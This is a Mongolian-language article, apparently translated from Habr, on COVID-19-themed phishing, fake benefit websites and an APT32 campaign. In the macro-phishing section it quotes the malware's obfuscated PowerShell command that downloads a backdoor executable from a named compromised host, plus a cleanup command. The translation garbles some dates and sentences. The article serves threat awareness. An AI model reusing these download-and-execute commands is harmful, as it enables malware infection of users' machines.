Халдагчид COVID-19-ийн сэдвийг үргэлжлүүлэн ашиглаж, тахал өвчинтэй холбоотой бүх зүйлийг сонирхож буй хэрэглэгчдэд улам бүр олон аюул заналхийлсээр байна. IN
Санаж байна уу
Та COVID-19-ийн үнэ төлбөргүй шинжилгээ хийлгэхийг хүсч байна уу?
Коронавирусын сэдэвт фишингийн өөр нэг чухал жишээ бол
Ихэнх хэрэглэгчдийг макро идэвхжүүлэхэд итгүүлэх нь бас хялбар байсан. Үүнийг хийхийн тулд стандарт заль мэхийг ашигласан: санал асуулгын хуудсыг бөглөхийн тулд та эхлээд макро идэвхжүүлэх хэрэгтэй бөгөөд энэ нь VBA скрипт ажиллуулах шаардлагатай гэсэн үг юм.
Таны харж байгаагаар VBA скрипт нь вирусны эсрэг програмаас тусгайлан далдлагдсан байдаг.
Windows-д програм нь өгөгдмөл "Тийм" гэсэн хариултыг хүлээн авахаас өмнө /T <секунд> хүлээдэг хүлээх онцлогтой. Манай тохиолдолд скрипт түр зуурын файлуудыг устгахаас өмнө 65 секунд хүлээсэн:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Хүлээж байхад хортой програм татаж авсан. Үүний тулд тусгай PowerShell скриптийг эхлүүлсэн:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 утгыг тайлсны дараа PowerShell скрипт нь Германаас өмнө нь хакердсан вэб сервер дээр байрлах арын хаалга татаж авдаг:
http://automatischer-staubsauger.com/feature/777777.png
гэсэн нэрээр хадгалдаг:
C:UsersPublictmpdirfile1.exe
хавтас ‘C:UsersPublictmpdir’
командыг агуулсан 'tmps1.bat' файлыг ажиллуулах үед устгагдах болно cmd /c mkdir ""C:UsersPublictmpdir"".
Төрийн байгууллагууд руу чиглэсэн дайралт
Нэмж дурдахад, FireEye-ийн шинжээчид саяхан Ухань дахь засгийн газрын бүтэц, түүнчлэн Хятадын Онцгой байдлын яам руу чиглэсэн APT32 халдлага үйлдсэн гэж мэдээлсэн. Тархсан RTF-н нэг нь Нью Йорк Таймс сонины гарчигтай нийтлэлийн холбоосыг агуулж байсан
Сонирхолтой нь илрүүлэх үед вирусын эсрэг програмуудын аль нь ч энэ тохиолдлыг илрүүлээгүй гэж Virustotal мэдээлэв.
Албан ёсны вэбсайтууд унтарсан үед
Өнгөрсөн өдөр Орост фишинг халдлагын хамгийн тод жишээ болжээ. Үүний шалтгаан нь 3-16 насны хүүхдүүдэд удаан хүлээгдэж буй тэтгэмжийг томилох явдал байв. 12 оны 2020-р сарын XNUMX-ны өдөр өргөдөл хүлээн авч эхэлснийг зарлахад олон сая хүмүүс удаан хүлээсэн тусламжийг авахаар Төрийн үйлчилгээний вэбсайт руу яаран очиж, мэргэжлийн DDoS халдлагаас дордохгүй порталыг устгасан. Ерөнхийлөгч “Төрийн алба өргөдлийн урсгалыг дийлэхгүй байна” гэж хэлэхэд хүмүүс цахим ертөнцөөр өргөдөл хүлээн авах өөр сайт нээх тухай ярьж эхэлсэн.
Асуудал нь хэд хэдэн сайтууд нэгэн зэрэг ажиллаж эхэлсэн бөгөөд нэг нь posobie16.gosuslugi.ru сайтын жинхэнэ програмыг хүлээн авдаг.
SearchInform-ийн хамт олон .ru бүсээс 30 орчим шинэ луйврын домэйн олжээ. “Infosecurity” болон “Softline” компани дөрөвдүгээр сарын эхнээс хойш ижил төстэй 70 гаруй төрийн үйлчилгээний цахим хуудсыг илрүүлжээ. Тэдний бүтээгчид танил тэмдэгтүүдийг хувиргаж, госуслуги, госуслуги-16, выплати, ковид-выплати, пособие гэх мэт үгсийн хослолыг ашигладаг.
Хайп ба нийгмийн инженерчлэл
Эдгээр бүх жишээнүүд халдагчид коронавирусын сэдвийг амжилттай мөнгөжүүлж байгааг л баталж байна. Нийгмийн хурцадмал байдал, тодорхойгүй асуудлууд их байх тусам луйварчид чухал мэдээлэл хулгайлах, хүмүүсийг өөрсдөө мөнгөө өгөхийг албадах, эсвэл зүгээр л илүү олон компьютерийг хакердах магадлал нэмэгддэг.
Царт тахал нь бэлтгэлгүй байж болзошгүй хүмүүсийг гэрээсээ бөөнөөр нь ажиллахад хүргэсэн тул хувийн мэдээлэл төдийгүй байгууллагын мэдээлэл эрсдэлд орж байна. Жишээлбэл, саяхан Microsoft 365 (хуучнаар Office 365) хэрэглэгчид фишинг халдлагад өртсөн. Хүмүүс захидлын хавсралт болгон асар их "алдсан" дуут мессеж хүлээн авсан. Гэсэн хэдий ч файлууд нь үнэндээ халдлагын хохирогчдыг илгээсэн HTML хуудас байсан
Эх сурвалж: www.habr.com